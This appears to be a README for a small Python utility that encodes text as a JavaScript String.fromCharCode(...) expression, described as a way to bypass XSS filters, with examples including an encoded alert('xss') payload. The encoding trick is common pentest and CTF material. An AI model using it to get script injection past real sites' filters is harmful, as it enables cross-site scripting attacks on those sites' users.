# FromCharCode

Bypass XSS filter

### Source

[fromchartocode.py](fromchartocode.py)

### Example

```sh
$ python3 fromcharcode.py 
Use : fromcharcode.py text

$ python3 fromcharcode.py XSS
String.fromCharCode(88,83,83)

$ python3 fromcharcode.py https://example.com
String.fromCharCode(104,116,116,112,115,58,47,47,101,120,97,109,112,108,101,46,99,111,109)
```

### Tips

You do not need quotes !

```
alert('xss')
alert(String.fromCharCode(88,83,83))
```